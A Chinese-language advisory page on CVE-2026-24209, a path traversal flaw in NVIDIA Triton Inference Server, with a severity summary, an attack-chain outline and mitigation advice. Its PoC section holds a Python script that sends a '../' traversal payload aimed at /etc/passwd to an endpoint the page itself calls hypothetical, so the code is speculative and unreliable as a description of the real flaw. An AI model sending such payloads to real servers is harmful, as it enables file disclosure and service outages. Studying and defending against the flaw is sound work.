CVE-2026-24209 CVSS 7.5 高危

CVE-2026-24209 NVIDIA Triton 路径遍历漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24209

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA Triton Inference Server

漏洞概述

NVIDIA Triton Inference Server 中存在一个路径遍历安全漏洞。攻击者无需用户交互或认证，即可通过网络向量利用此漏洞。通过发送特制的恶意请求，攻击者可能触发路径解析错误，导致服务异常终止或资源耗尽，进而造成严重的拒绝服务状态，影响推理任务的正常运行。

技术细节

该漏洞的根本原因是 NVIDIA Triton Inference Server 在处理特定 API 请求时，未能充分净化用户提供的路径参数，导致验证逻辑失效。攻击者可以利用这一缺陷，通过注入“../”或绝对路径序列，执行路径遍历攻击，试图访问预期范围之外的文件系统资源。尽管 CVSS 评分侧重于可用性影响（A:H），表明主要后果是服务中断，但此类漏洞理论上也可能引发敏感信息泄露风险。攻击过程无需任何用户交互或身份认证，利用难度低（AC:L）。一旦漏洞被成功触发，可能导致服务器后台进程异常终止、资源耗尽或陷入死循环，从而造成严重的拒绝服务，完全阻断正常的 AI 推理任务。

攻击链分析

STEP 1

侦察

攻击者扫描网络以寻找暴露在互联网上的 NVIDIA Triton Inference Server 实例。

STEP 2

武器化

攻击者构造包含路径遍历字符（如 '../'）的恶意 HTTP 请求，旨在绕过服务器的路径验证机制。

STEP 3

传递

攻击者通过网络向目标服务器的特定接口发送该恶意请求，无需任何用户交互或身份认证。

STEP 4

利用

服务器接收到请求后，由于未能正确过滤路径，解析了恶意路径，导致系统逻辑错误或资源访问冲突。

STEP 5

影响

漏洞利用成功导致服务器进程崩溃、无响应或重启，造成拒绝服务，推理任务被迫中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2026-24209
# Target: NVIDIA Triton Inference Server
# Description: Sends a payload with path traversal sequences to trigger DoS.

target_host = "http://target-triton-server:8000"
vulnerable_endpoint = "/v2/models/infer"  # Hypothetical endpoint

# Payload attempting to traverse directories
payload = {
    "model_name": "../../../../../../etc/passwd"
}

try:
    print(f"Sending request to {target_host}{vulnerable_endpoint}...")
    response = requests.post(target_host + vulnerable_endpoint, json=payload, timeout=5)
    
    # Check if the service is still responding or if it crashed
    if response.status_code == 200:
        print("Request sent successfully. Check server logs for path access.")
    else:
        print(f"Received status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    # A connection error or timeout might indicate a successful DoS
    print(f"Connection failed or timeout: {e}")
    print("The server might have crashed (Denial of Service).")

影响范围

NVIDIA Triton Inference Server (具体受影响版本请参考 NVIDIA 官方安全公告)

防御指南

临时缓解措施

如果不能立即升级，建议限制对 NVIDIA Triton Inference Server 的网络访问，仅允许可信的内部 IP 地址连接。同时，应密切监控服务器日志，检测是否存在异常的文件路径访问请求或频繁的服务崩溃行为，并准备应急响应计划以快速恢复服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表